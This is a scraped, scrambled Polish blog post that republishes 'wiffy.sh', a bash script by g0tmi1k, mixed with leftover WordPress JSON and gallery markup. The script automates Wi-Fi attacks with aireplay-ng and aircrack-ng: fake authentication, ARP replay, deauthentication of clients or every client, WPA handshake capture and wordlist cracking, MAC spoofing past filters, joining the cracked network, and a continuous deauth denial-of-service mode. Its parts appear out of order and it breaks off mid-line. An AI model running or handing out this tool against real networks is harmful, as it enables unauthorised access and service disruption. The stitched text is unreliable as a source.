\"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/akwarium\/akwarium0006.jpg\"\n){kind=link}
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; 